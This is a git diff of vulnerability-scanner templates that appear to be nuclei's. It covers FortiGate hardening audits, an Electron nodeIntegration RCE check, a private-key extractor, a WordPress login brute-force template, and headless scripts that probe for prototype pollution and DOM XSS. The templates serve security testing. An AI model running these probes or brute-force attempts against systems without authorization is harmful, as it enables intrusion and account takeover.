+id: auto-usb-install
+
+info:
+  name: Auto USB Installation Enabled
+  author: pussycat0x
+  severity: info
+  description: If USB installation is not disabled, an attacker with physical access to a FortiGate could load a new configuration or firmware using the USB port.
+  reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
+  tags: fortigate,config,audit,firewall
+
+file:
+  - extensions:
+      - conf
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "set auto-install-config disable"
+          - "set auto-install-image disable"
+        negative: true
+
+      - type: word
+        words:
+          - "config system"
+          - "config router"
+          - "config firewall"
+        condition: or
diff --git a/file/audit/fortigate/heuristic-scan.yaml b/file/audit/fortigate/heuristic-scan.yaml
index cab986f036..2637a1d0ab 100644
--- a/file/audit/fortigate/heuristic-scan.yaml
+++ b/file/audit/fortigate/heuristic-scan.yaml
@@ -1,28 +1,28 @@
-id: heuristic-scan
-
-info:
-  name: Heuristic scanning is not configured
-  author: pussycat0x
-  severity: info
-  description: Heuristic scanning is a technique used to identify previously unknown viruses. A value of block enables heuristic AV scanning of binary files and blocks any detected. A replacement message will be forwarded to the recipient. Blocked files are quarantined if quarantine is enabled.
-  reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
-  tags: fortigate,config,audit,firewall
-
-file:
-  - extensions:
-      - conf
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "config antivirus heuristic"
-          - "set mode block"
-        negative: true
-
-      - type: word
-        words:
-          - "config system"
-          - "config router"
-          - "config firewall"
+id: heuristic-scan
+
+info:
+  name: Heuristic scanning is not configured
+  author: pussycat0x
+  severity: info
+  description: Heuristic scanning is a technique used to identify previously unknown viruses. A value of block enables heuristic AV scanning of binary files and blocks any detected. A replacement message will be forwarded to the recipient. Blocked files are quarantined if quarantine is enabled.
+  reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
+  tags: fortigate,config,audit,firewall
+
+file:
+  - extensions:
+      - conf
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "config antivirus heuristic"
+          - "set mode block"
+        negative: true
+
+      - type: word
+        words:
+          - "config system"
+          - "config router"
+          - "config firewall"
         condition: or
\ No newline at end of file
diff --git a/file/audit/fortigate/inactivity-timeout.yaml b/file/audit/fortigate/inactivity-timeout.yaml
index 9c032f8874..8827541e1f 100644
--- a/file/audit/fortigate/inactivity-timeout.yaml
+++ b/file/audit/fortigate/inactivity-timeout.yaml
@@ -1,27 +1,27 @@
-id: inactivity-timeout
-
-info:
-  name: Inactivity Timeout Not Implemented
-  author: pussycat0x
-  severity: info
-  description: Lack of Inactivity Timeout gives the unauthorized user to act within that threshold if the administrator is away from the computer.
-  reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
-  tags: fortigate,config,audit,firewall
-
-file:
-  - extensions:
-      - conf
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "set admin-console-timeout"
-        negative: true
-
-      - type: word
-        words:
-          - "config system"
-          - "config router"
-          - "config firewall"
+id: inactivity-timeout
+
+info:
+  name: Inactivity Timeout Not Implemented
+  author: pussycat0x
+  severity: info
+  description: Lack of Inactivity Timeout gives the unauthorized user to act within that threshold if the administrator is away from the computer.
+  reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
+  tags: fortigate,config,audit,firewall
+
+file:
+  - extensions:
+      - conf
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "set admin-console-timeout"
+        negative: true
+
+      - type: word
+        words:
+          - "config system"
+          - "config router"
+          - "config firewall"
         condition: or
\ No newline at end of file
diff --git a/file/audit/fortigate/maintainer-account.yaml b/file/audit/fortigate/maintainer-account.yaml
index bb9068401a..be3e69a417 100644
--- a/file/audit/fortigate/maintainer-account.yaml
+++ b/file/audit/fortigate/maintainer-account.yaml
@@ -1,27 +1,27 @@
-id: maintainer-account
-
-info:
-  name: Maintainer Account Not Implemented
-  author: pussycat0x
-  severity: info
-  description: If the FortiGate is compromised and Password is not recoverable. A maintainer account can be used by an administrator with physical access to log into CLI..
-  reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate
-  tags: fortigate,config,audit,firewall
-
-file:
-  - extensions:
-      - conf
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "set admin-maintainer"
-        negative: true
-
-      - type: word
-        words:
-          - "config system"
-          - "config router"
-          - "config firewall"
+id: maintainer-account
+
+info:
+  name: Maintainer Account Not Implemented
+  author: pussycat0x
+  severity: info
+  description: If the FortiGate is compromised and Password is not recoverable. A maintainer account can be used by an administrator with physical access to log into CLI..
+  reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate
+  tags: fortigate,config,audit,firewall
+
+file:
+  - extensions:
+      - conf
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "set admin-maintainer"
+        negative: true
+
+      - type: word
+        words:
+          - "config system"
+          - "config router"
+          - "config firewall"
         condition: or
\ No newline at end of file
diff --git a/file/audit/fortigate/password-policy.yaml b/file/audit/fortigate/password-policy.yaml
index 44910a95d1..30c3ff510c 100644
--- a/file/audit/fortigate/password-policy.yaml
+++ b/file/audit/fortigate/password-policy.yaml
@@ -1,27 +1,27 @@
-id: password-policy
-
-info:
-  name: Password Policy not Set
-  author: pussycat0x
-  severity: info
-  description: The Administrative Password Policy is not set. Use the password policy feature to ensure all administrators use secure passwords that meet your organization's requirements.
-  reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
-  tags: fortigate,config,audit,firewall
-
-file:
-  - extensions:
-      - conf
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "config system password-policy"
-        negative: true
-
-      - type: word
-        words:
-          - "config system"
-          - "config router"
-          - "config firewall"
+id: password-policy
+
+info:
+  name: Password Policy not Set
+  author: pussycat0x
+  severity: info
+  description: The Administrative Password Policy is not set. Use the password policy feature to ensure all administrators use secure passwords that meet your organization's requirements.
+  reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
+  tags: fortigate,config,audit,firewall
+
+file:
+  - extensions:
+      - conf
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "config system password-policy"
+        negative: true
+
+      - type: word
+        words:
+          - "config system"
+          - "config router"
+          - "config firewall"
         condition: or
\ No newline at end of file
diff --git a/file/audit/fortigate/remote-auth-timeout.yaml b/file/audit/fortigate/remote-auth-timeout.yaml
index 43870c984d..b2538b9722 100644
--- a/file/audit/fortigate/remote-auth-timeout.yaml
+++ b/file/audit/fortigate/remote-auth-timeout.yaml
@@ -1,27 +1,27 @@
-id: remote-auth-timeout
-
-info:
-  name: Remote Authentication timeout not set
-  author: pussycat0x
-  severity: info
-  description: Lack of Inactivity Timeout gives the unauthorized user to act within that threshold if the administrator is away from the computer.
-  reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate
-  tags: fortigate,config,audit,firewall
-
-file:
-  - extensions:
-      - conf
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "set remoteauthtimeout"
-        negative: true
-
-      - type: word
-        words:
-          - "config system"
-          - "config router"
-          - "config firewall"
+id: remote-auth-timeout
+
+info:
+  name: Remote Authentication timeout not set
+  author: pussycat0x
+  severity: info
+  description: Lack of Inactivity Timeout gives the unauthorized user to act within that threshold if the administrator is away from the computer.
+  reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate
+  tags: fortigate,config,audit,firewall
+
+file:
+  - extensions:
+      - conf
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "set remoteauthtimeout"
+        negative: true
+
+      - type: word
+        words:
+          - "config system"
+          - "config router"
+          - "config firewall"
         condition: or
\ No newline at end of file
diff --git a/file/audit/fortigate/scp-admin.yaml b/file/audit/fortigate/scp-admin.yaml
index 4f776836b6..06f9f3f558 100644
--- a/file/audit/fortigate/scp-admin.yaml
+++ b/file/audit/fortigate/scp-admin.yaml
@@ -1,27 +1,27 @@
-id: scp-admin
-
-info:
-  name: Admin-SCP Disabled
-  author: pussycat0x
-  severity: info
-  description: Disable SCP by default. Enabling SCP allows downloading the configuration file from the FortiGate as an alternative method of backing up the configuration file.
-  reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate
-  tags: fortigate,config,audit,firewall
-
-file:
-  - extensions:
-      - conf
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "set admin-scp enable"
-        negative: true
-
-      - type: word
-        words:
-          - "config system"
-          - "config router"
-          - "config firewall"
+id: scp-admin
+
+info:
+  name: Admin-SCP Disabled
+  author: pussycat0x
+  severity: info
+  description: Disable SCP by default. Enabling SCP allows downloading the configuration file from the FortiGate as an alternative method of backing up the configuration file.
+  reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate
+  tags: fortigate,config,audit,firewall
+
+file:
+  - extensions:
+      - conf
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "set admin-scp enable"
+        negative: true
+
+      - type: word
+        words:
+          - "config system"
+          - "config router"
+          - "config firewall"
         condition: or
\ No newline at end of file
diff --git a/file/audit/fortigate/strong-ciphers.yaml b/file/audit/fortigate/strong-ciphers.yaml
index 170d6183a5..d2443279c6 100644
--- a/file/audit/fortigate/strong-ciphers.yaml
+++ b/file/audit/fortigate/strong-ciphers.yaml
@@ -1,27 +1,27 @@
-id: strong-ciphers
-
-info:
-  name: HTTPS/SSH Strong Ciphers Not Enabled
-  author: pussycat0x
-  severity: info
-  description: Weak Ciphers can be broken by an attacker in a local network and can perform attacks like Blowfish.
-  reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
-  tags: fortigate,config,audit,firewall
-
-file:
-  - extensions:
-      - conf
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "set strong-crypto enable"
-        negative: true
-
-      - type: word
-        words:
-          - "config system"
-          - "config router"
-          - "config firewall"
+id: strong-ciphers
+
+info:
+  name: HTTPS/SSH Strong Ciphers Not Enabled
+  author: pussycat0x
+  severity: info
+  description: Weak Ciphers can be broken by an attacker in a local network and can perform attacks like Blowfish.
+  reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
+  tags: fortigate,config,audit,firewall
+
+file:
+  - extensions:
+      - conf
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "set strong-crypto enable"
+        negative: true
+
+      - type: word
+        words:
+          - "config system"
+          - "config router"
+          - "config firewall"
         condition: or
\ No newline at end of file
diff --git a/file/electron/node-integration-enabled.yaml b/file/electron/node-integration-enabled.yaml
index a2c58017d2..d0e3061b56 100644
--- a/file/electron/node-integration-enabled.yaml
+++ b/file/electron/node-integration-enabled.yaml
@@ -1,14 +1,15 @@
 id: node-integration-enabled
 
 info:
-  name: Node Integration Enabled
+  name: Electron Applications - Cross-Site Scripting & Remote Code Execution
   author: me9187
   severity: critical
+  description: |
+    Electron Applications is susceptible to remote code execution by way of cross-site scripting via nodeIntegration  by calling require('child_process').exec('COMMAND');.
   reference:
     - https://blog.yeswehack.com/yeswerhackers/exploitation/pentesting-electron-applications/
     - https://book.hacktricks.xyz/pentesting/pentesting-web/xss-to-rce-electron-desktop-apps
   tags: electron,file,nodejs
-  # nodeIntegration in Electron Applications means you can turn XSS into RCE by calling require('child_process').exec('COMMAND');
 
 file:
   - extensions:
@@ -19,3 +20,5 @@ file:
       - type: word
         words:
           - "nodeIntegration: true"
+
+# Enhanced by mp on 2022/05/19
diff --git a/file/keys/private-key.yaml b/file/keys/private-key.yaml
index 3e779effd4..d1f6cd83f5 100644
--- a/file/keys/private-key.yaml
+++ b/file/keys/private-key.yaml
@@ -13,12 +13,12 @@ file:
     extractors:
       - type: regex
         regex:
-          - "\"BEGIN OPENSSH PRIVATE KEY\""
-          - "\"BEGIN PRIVATE KEY\""
-          - "\"BEGIN RSA PRIVATE KEY\""
-          - "\"BEGIN DSA PRIVATE KEY\""
-          - "\"BEGIN EC PRIVATE KEY\""
-          - "\"BEGIN PGP PRIVATE KEY BLOCK\""
-          - "\"ssh-rsa\""
-          - "\"ssh-dsa\""
-          - "\"ssh-ed25519\""
+          - "BEGIN OPENSSH PRIVATE KEY"
+          - "BEGIN PRIVATE KEY"
+          - "BEGIN RSA PRIVATE KEY"
+          - "BEGIN DSA PRIVATE KEY"
+          - "BEGIN EC PRIVATE KEY"
+          - "BEGIN PGP PRIVATE KEY BLOCK"
+          - "ssh-rsa"
+          - "ssh-dsa"
+          - "ssh-ed25519"
diff --git a/fuzzing/iis-shortname.yaml b/fuzzing/iis-shortname.yaml
index 4af5112458..2d3752e7ec 100644
--- a/fuzzing/iis-shortname.yaml
+++ b/fuzzing/iis-shortname.yaml
@@ -8,7 +8,7 @@ info:
   reference:
     - https://github.com/lijiejie/IIS_shortname_Scanner
     - https://www.exploit-db.com/exploits/19525
-  tags: fuzz
+  tags: fuzz,edb
 
 requests:
   - raw:
diff --git a/fuzzing/wordpress-weak-credentials.yaml b/fuzzing/wordpress-weak-credentials.yaml
index 0bec5f6f85..aa02cd2b18 100644
--- a/fuzzing/wordpress-weak-credentials.yaml
+++ b/fuzzing/wordpress-weak-credentials.yaml
@@ -1,9 +1,17 @@
 id: wordpress-weak-credentials
 
 info:
-  name: WordPress Weak Credentials
+  name: WordPress - Weak Credentials
   author: evolutionsec
   severity: critical
+  description: |
+    Weak WordPress Credentials were discovered.
+  reference:
+    - https://www.wpwhitesecurity.com/strong-wordpress-passwords-wpscan/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
+    cvss-score: 5.8
+    cwe-id: CWE-522
   tags: wordpress,default-login,fuzz
 
 requests:
@@ -22,16 +30,20 @@ requests:
       passwords: helpers/wordlists/wp-passwords.txt
     threads: 50
     attack: clusterbomb
+
     stop-at-first-match: true
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 302
 
       - type: word
+        part: header
         words:
           - '/wp-admin'
           - 'wordpress_logged_in'
         condition: and
-        part: header
\ No newline at end of file
+
+      - type: status
+        status:
+          - 302
+
+# Enhanced by mp on 2022/05/19
diff --git a/headless/dvwa-headless-automatic-login.yaml b/headless/dvwa-headless-automatic-login.yaml
index 61d192f956..bd48c62f5e 100644
--- a/headless/dvwa-headless-automatic-login.yaml
+++ b/headless/dvwa-headless-automatic-login.yaml
@@ -37,8 +37,15 @@ headless:
           xpath: /html/body/div/div[2]/form/fieldset/p/input
         action: click
       - action: waitload
+
+    matchers-condition: or
     matchers:
       - part: resp
         type: word
         words:
           - "You have logged in as"
+
+      - part: resp
+        type: word
+        words:
+          - "First time using DVWA"
diff --git a/headless/extract-urls.yaml b/headless/extract-urls.yaml
index 524b8d8644..2d7a1060d9 100644
--- a/headless/extract-urls.yaml
+++ b/headless/extract-urls.yaml
@@ -11,12 +11,17 @@ headless:
       - args:
           url: "{{BaseURL}}"
         action: navigate
+
       - action: waitload
+
       - action: script
         name: extract
         args:
           code: |
-            '\n' + [...new Set(Array.from(document.querySelectorAll('[src], [href], [url], [action]')).map(i => i.src || i.href || i.url || i.action))].join('\r\n') + '\n'
+            () => {
+             return '\n' + [...new Set(Array.from(document.querySelectorAll('[src], [href], [url], [action]')).map(i => i.src || i.href || i.url || i.action))].join('\r\n') + '\n'
+            }
+
     extractors:
       - type: kval
         part: extract
diff --git a/headless/postmessage-outgoing-tracker.yaml b/headless/postmessage-outgoing-tracker.yaml
index a200db4661..d1259b7c54 100644
--- a/headless/postmessage-outgoing-tracker.yaml
+++ b/headless/postmessage-outgoing-tracker.yaml
@@ -15,50 +15,55 @@ headless:
           part: response
           key: Content-Security-Policy
           value: "default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;"
+
       - action: script
         args:
           hook: true
           code: |
-            (function() {window.alerts = [];
+            () => {
+              window.alerts = [];
 
-            function logger(found) {
-            	window.alerts.push(found);
-            }
+              logger = found => window.alerts.push(found);
 
-            function getStackTrace () {
-              var stack;
-              try {
-                throw new Error('');
+              function getStackTrace() {
+                var stack;
+                try {
+                  throw new Error('');
+                } catch (error) {
+                  stack = error.stack || '';
+                }
+
+                stack = stack.split('\n').map(line => line.trim());
+                return stack.splice(stack[0] == 'Error' ? 2 : 1);
               }
-              catch (error) {
-                stack = error.stack || '';
-              }
-              stack = stack.split('\n').map(function (line) { return line.trim(); });
-              return stack.splice(stack[0] == 'Error' ? 2 : 1);
-            }
 
-            var oldSender = window.postMessage;
+              var oldSender = window.postMessage;
 
-            window.postMessage = function(data, origin) {
-            if(origin == '*'){
-                logger({stack: getStackTrace(), args: {data, origin}});
-                return oldSender.apply(this, arguments);
+              window.postMessage = (data, origin) => {
+                if (origin == '*') {
+                  logger({stack: getStackTrace(), args: {data, origin}});
+                  return oldSender.apply(this, arguments);
                 }
               };
-            })();
+            }
+
       - args:
           url: "{{BaseURL}}"
         action: navigate
       - action: waitload
+
       - action: script
         name: alerts
         args:
-          code: "window.alerts"
+          code: |
+            () => { window.alerts }
+
     matchers:
       - type: word
         part: alerts
         words:
           - "at window.postMessage"
+
     extractors:
       - type: kval
         part: alerts
diff --git a/headless/postmessage-tracker.yaml b/headless/postmessage-tracker.yaml
index d0a1e79480..c38d7b601f 100644
--- a/headless/postmessage-tracker.yaml
+++ b/headless/postmessage-tracker.yaml
@@ -15,50 +15,55 @@ headless:
           part: response
           key: Content-Security-Policy
           value: "default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;"
+
       - action: script
         args:
           hook: true
           code: |
-            (function() {window.alerts = [];
+            () => {
+              window.alerts = [];
 
-            function logger(found) {
-            	window.alerts.push(found);
+              logger = found => window.alerts.push(found);
+
+              function getStackTrace() {
+                var stack;
+                try {
+                  throw new Error('');
+                } catch (error) {
+                  stack = error.stack || '';
+                }
+
+                stack = stack.split('\n').map(line => line.trim());
+                return stack.splice(stack[0] == 'Error' ? 2 : 1);
+              }
+
+              var oldListener = Window.prototype.addEventListener;
+
+              Window.prototype.addEventListener = (type, listener, useCapture) => {
+                if (type === 'message') {
+                  logger(getStackTrace());
+                }
+                return oldListener.apply(this, arguments);
+              };
             }
 
-            function getStackTrace () {
-              var stack;
-              try {
-                throw new Error('');
-              }
-              catch (error) {
-                stack = error.stack || '';
-              }
-              stack = stack.split('\n').map(function (line) { return line.trim(); });
-              return stack.splice(stack[0] == 'Error' ? 2 : 1);
-            }
-
-            var oldListener = Window.prototype.addEventListener;
-
-            Window.prototype.addEventListener = function(type, listener, useCapture) {
-              if(type === 'message') {
-                logger(getStackTrace());
-              }
-              return oldListener.apply(this, arguments);
-            };
-            })();
       - args:
           url: "{{BaseURL}}"
         action: navigate
       - action: waitload
+
       - action: script
         name: alerts
         args:
-          code: "window.alerts"
+          code: |
+            () => { window.alerts }
+
     matchers:
       - type: word
         part: alerts
         words:
           - "at Window.addEventListener"
+
     extractors:
       - type: kval
         part: alerts
diff --git a/headless/prototype-pollution-check.yaml b/headless/prototype-pollution-check.yaml
index e5a3eac027..94645993f4 100644
--- a/headless/prototype-pollution-check.yaml
+++ b/headless/prototype-pollution-check.yaml
@@ -30,66 +30,70 @@ headless:
           hook: true
           code: |
             // Hooking code adapted from https://github.com/msrkp/PPScan/blob/main/scripts/content_script.js
-            (function() {window.alerts = [];
+            () => {
+              window.alerts = [];
 
-            function logger(found) {
-            	window.alerts.push(found);
+              logger = found => window.alerts.push(found);
+
+              function check() {
+                  loc = location.href;
+
+                  if (loc.indexOf("e32a5ec9c99") >= 0 && loc.search("a0def12bce") == -1) {
+                      setTimeout(function() {
+                          if (Object.prototype.e32a5ec9c99 == "ddcb362f1d60") {
+                              logger(location.href);
+                          }
+                          var url = new URL(location.origin + location.pathname);
+                          url.hash = "__proto__[a0def12bce]=ddcb362f1d60&__proto__.a0def12bce=ddcb362f1d60&dummy";
+                          location = url.href;
+                      }, 5 * 1000);
+                  } else if (loc.search("a0def12bce") != -1) {
+                      setTimeout(function() {
+                          if (Object.prototype.a0def12bce == "ddcb362f1d60") {
+                              logger(location.href);
+                          }
+                          window.close();
+                      }, 5 * 1000);
+                  } else {
+                      var url = new URL(loc);
+                      url.searchParams.append("__proto__[e32a5ec9c99]", "ddcb362f1d60");
+                      url.searchParams.append("__proto__.e32a5ec9c99", "ddcb362f1d60");
+                      location = url.href;
+                  }
+              }
+
+              window.onload = function() {
+                  if (Object.prototype.e32a5ec9c99 == "ddcb362f1d60" ||  Object.prototype.a0def12bce == "ddcb362f1d60") {
+                      logger(location.href);
+                  } else {
+                      check();
+                  }
+              };
+
+              var timerID = setInterval(function() {
+                  if (Object.prototype.e32a5ec9c99 == "ddcb362f1d60" || Object.prototype.a0def12bce == "ddcb362f1d60") {
+                      logger(location.href);
+                      clearInterval(timerID);
+                  }
+              }, 5 * 1000);
             }
-
-            function check() {
-                loc = location.href;
-
-                if (loc.indexOf("e32a5ec9c99") >= 0 && loc.search("a0def12bce") == -1) {
-                    setTimeout(function() {
-                        if (Object.prototype.e32a5ec9c99 == "ddcb362f1d60") {
-                            logger(location.href);
-                        }
-                        var url = new URL(location.origin + location.pathname);
-                        url.hash = "__proto__[a0def12bce]=ddcb362f1d60&__proto__.a0def12bce=ddcb362f1d60&dummy";
-                        location = url.href;
-                    }, 5 * 1000);
-                } else if (loc.search("a0def12bce") != -1) {
-                    setTimeout(function() {
-                        if (Object.prototype.a0def12bce == "ddcb362f1d60") {
-                            logger(location.href);
-                        }
-                        window.close();
-                    }, 5 * 1000);
-                } else {
-                    var url = new URL(loc);
-                    url.searchParams.append("__proto__[e32a5ec9c99]", "ddcb362f1d60");
-                    url.searchParams.append("__proto__.e32a5ec9c99", "ddcb362f1d60");
-                    location = url.href;
-                }
-            }
-
-            window.onload = function() {
-                if (Object.prototype.e32a5ec9c99 == "ddcb362f1d60" ||  Object.prototype.a0def12bce == "ddcb362f1d60") {
-                    logger(location.href);
-                } else {
-                    check();
-                }
-            };
-
-            var timerID = setInterval(function() {
-                if (Object.prototype.e32a5ec9c99 == "ddcb362f1d60" || Object.prototype.a0def12bce == "ddcb362f1d60") {
-                    logger(location.href);
-                    clearInterval(timerID);
-                }
-            }, 5 * 1000)})();
       - args:
           url: "{{BaseURL}}"
         action: navigate
       - action: waitload
+
       - action: script
         name: alerts
         args:
-          code: "window.alerts"
+          code: |
+            () => { window.alerts }
+
     matchers:
       - type: word
         part: alerts
         words:
           - "__proto__"
+
     extractors:
       - type: kval
         part: alerts
diff --git a/headless/screenshot.yaml b/headless/screenshot.yaml
new file mode 100644
index 0000000000..7b2f18dcdf
--- /dev/null
+++ b/headless/screenshot.yaml
@@ -0,0 +1,29 @@
+id: screenshot
+
+info:
+  name: Headless Screenshotter
+  author: V0idC0de,righettod
+  severity: info
+  description: Takes a screenshot of the specified URLS.
+  tags: headless,screenshot
+
+variables:
+  file: "{{Hostname}}"
+
+headless:
+  - steps:
+      - action: setheader
+        args:
+          part: request
+          key: "User-Agent"
+          value: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0"
+
+      - action: navigate
+        args:
+          url: "{{BaseURL}}"
+
+      - action: waitload
+      - action: screenshot
+        args:
+          fullpage: true
+          to: "{{file}}"
diff --git a/headless/window-name-domxss.yaml b/headless/window-name-domxss.yaml
index 7c202f7d8b..0e54b61520 100644
--- a/headless/window-name-domxss.yaml
+++ b/headless/window-name-domxss.yaml
@@ -15,66 +15,73 @@ headless:
           part: response
           key: Content-Security-Policy
           value: "default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;"
+
       - action: script
         args:
           hook: true
           code: |
-            (function() {window.alerts = [];
+            () => {
+              window.alerts = [];
 
-            function logger(found) {
-            	window.alerts.push(found);
-            }
+              logger = found => window.alerts.push(found);
 
-            function getStackTrace () {
-              var stack;
-              try {
-                throw new Error('');
-              }
-              catch (error) {
-                stack = error.stack || '';
-              }
-              stack = stack.split('\n').map(function (line) { return line.trim(); });
-              return stack.splice(stack[0] == 'Error' ? 2 : 1);
-            }
-            window.name = "{{randstr_1}}'\"<>";
-
-            var oldEval = eval;
-            var oldDocumentWrite = document.write;
-            var setter = Object.getOwnPropertyDescriptor(Element.prototype, 'innerHTML').set;
-            Object.defineProperty(Element.prototype, 'innerHTML', {
-              set: function innerHTML_Setter(val) {
-                if (val.includes("{{randstr_1}}'\"<>")) {
-                  logger({sink: 'innerHTML', source: 'window.name', code: val, stack: getStackTrace()});
+              function getStackTrace() {
+                var stack;
+                try {
+                  throw new Error('');
                 }
-                return setter.call(this, val)
+                catch (error) {
+                  stack = error.stack || '';
+                }
+                stack = stack.split('\n').map(function (line) { return line.trim(); });
+                return stack.splice(stack[0] == 'Error' ? 2 : 1);
               }
-            });
-            eval = function(data) {
-              if (data.includes("{{randstr_1}}'\"<>")) {
-                logger({sink: 'eval' ,source: 'window.name', code: data, stack: getStackTrace()});
-              }
-              return oldEval.apply(this, arguments);
-            };
-            document.write = function(data) {
-              if (data.includes("{{randstr_1}}'\"<>")) {
-                logger({sink: 'document.write' ,source: 'window.name', code: data, stack: getStackTrace()});
-              }
-              return oldEval.apply(this, arguments);
-            };
-            })();
+              window.name = "{{randstr_1}}'\"<>";
+
+              var oldEval = eval;
+              var oldDocumentWrite = document.write;
+              var setter = Object.getOwnPropertyDescriptor(Element.prototype, 'innerHTML').set;
+              Object.defineProperty(Element.prototype, 'innerHTML', {
+                set: function innerHTML_Setter(val) {
+                  if (val.includes("{{randstr_1}}'\"<>")) {
+                    logger({sink: 'innerHTML', source: 'window.name', code: val, stack: getStackTrace()});
+                  }
+                  return setter.call(this, val)
+                }
+              });
+
+              eval = function(data) {
+                if (data.includes("{{randstr_1}}'\"<>")) {
+                  logger({sink: 'eval' ,source: 'window.name', code: data, stack: getStackTrace()});
+                }
+                return oldEval.apply(this, arguments);
+              };
+
+              document.write = function(data) {
+                if (data.includes("{{randstr_1}}'\"<>")) {
+                  logger({sink: 'document.write' ,source: 'window.name', code: data, stack: getStackTrace()});
+                }
+                return oldEval.apply(this, arguments);
+              };
+            }
+
       - args:
           url: "{{BaseURL}}"
         action: navigate
       - action: waitload
+
       - action: script
         name: alerts
         args:
-          code: "window.alerts"
+          code: |
+            () => { window.alerts }
+
     matchers:
       - type: word
         part: alerts
         words:
           - "sink:"
+
     extractors:
       - type: kval
         part: alerts
diff --git a/helpers/payloads/CVE-2020-5776.csv b/helpers/payloads/CVE-2020-5776.csv
index 46ecc61ce2..b6c0022401 100644
--- a/helpers/payloads/CVE-2020-5776.csv
+++ b/helpers/payloads/CVE-2020-5776.csv
@@ -1,34 +1,34 @@
-sku,attribute_set,type,store,websites,configurable_attributes,color,full_size,name,description,short_description,full_features,att_ean,price,special_price,rrp,qty,is_in_stock,manage_stock,use_config_manage_stock,status,visibility,weight,category_ids,tax_class_id,thumbnail,small_image,image,media_gallery,arw_brand 
+sku,attribute_set,type,store,websites,configurable_attributes,color,full_size,name,description,short_description,full_features,att_ean,price,special_price,rrp,qty,is_in_stock,manage_stock,use_config_manage_stock,status,visibility,weight,category_ids,tax_class_id,thumbnail,small_image,image,media_gallery,arw_brand 
 AF001WHIT2XL,Default,simple,admin,Default,"color,full_size",White,2XL,Chef's kit jacket with press stud (DD16)-White-2XL,"Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value.  Washing Instructions: 65 degree industrial wash.
 ","Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value.  Washing Instructions: 65 degree industrial wash.
-","Stainless steel press studs    One way fastening    Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
+","Stainless steel press studs    One way fastening    Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
 AF001WHIT2XS,Default,simple,admin,Default,"color,full_size",White,2XS,Chef's kit jacket with press stud (DD16)-White-2XS,"Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value.  Washing Instructions: 65 degree industrial wash.
 ","Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value.  Washing Instructions: 65 degree industrial wash.
-","Stainless steel press studs    One way fastening    Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
